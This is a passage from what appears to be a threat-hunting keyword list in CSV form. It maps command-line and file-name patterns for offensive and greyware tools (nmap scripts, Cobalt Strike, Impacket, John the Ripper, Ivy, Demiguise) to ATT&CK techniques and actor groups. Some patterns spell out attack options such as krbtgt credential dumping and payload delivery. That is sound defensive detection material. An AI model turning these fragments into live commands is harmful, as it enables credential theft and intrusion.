tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ipmi-cipher-zero.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ipmi-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ipv6-multicast-mld-list.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ipv6-node-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ipv6-ra-flood.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* irc-botnet-channels.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* irc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* irc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* irc-sasl-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* irc-unrealircd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -isbeacon *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"* iscsi-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* iscsi-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* isns-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --isroca --publickey *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -it bloodhound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"* -Ix64 *.bin -Ix86 *.bin -P Inject -O *.png -stageless*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -Ix64 *.bin -Ix86 *.bin -P Local -O *.hta -url http:* -delivery hta -stageless*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -Ix64 *.bin -Ix86 *.bin -P Local -O *.js -url http* -delivery bits -stageless*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -Ix64 *.bin -Ix86 *.bin -P Local -O *.txt -url http* -delivery macro -stageless*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -Ix64 *.bin -Ix86 *.bin -P Local -O *.xsl -url http* -delivery xsl -stageless*","greyware_tool_keyword","ivy","Ivy is a payload creation 
framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -Ix64 *.c -Ix86 *.c -P Local -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -Ix64 *.vba -Ix86 *.vba -P Inject -O *","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -jar ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"* jdwp-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* jdwp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* jdwp-inject.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* jdwp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -JMXConsole -AppName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* john_done*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_fork*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_load*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_load_conf*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_load_conf_db*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_log_format*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_log_format2*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_mpi_wait*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_omp_fallback*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* 
john_omp_init*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_omp_maybe_adjust_or_fallback*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_omp_show_info*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_register_all*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_register_one*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_run*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_set_mpi*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_set_tristates*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_wait*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* JohnTheRipper/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* JspShell ua*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* -just-dc-ntlm *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -just-dc-user *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -just-dc-user 'krbtgt' -dc-ip * -k -no-pass @*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -k * -c *.exe* -p Outlook.Application -o *.hta*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"* -k * -c *cmd.exe /c * -o *.hta -p ShellBrowserWindow*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"* -k --kerberoast*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","0","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" +"* -k -request-user * -dc-ip*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* k8gege520 *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* kalilinux/kali-rolling*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* kdbof.cpp*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
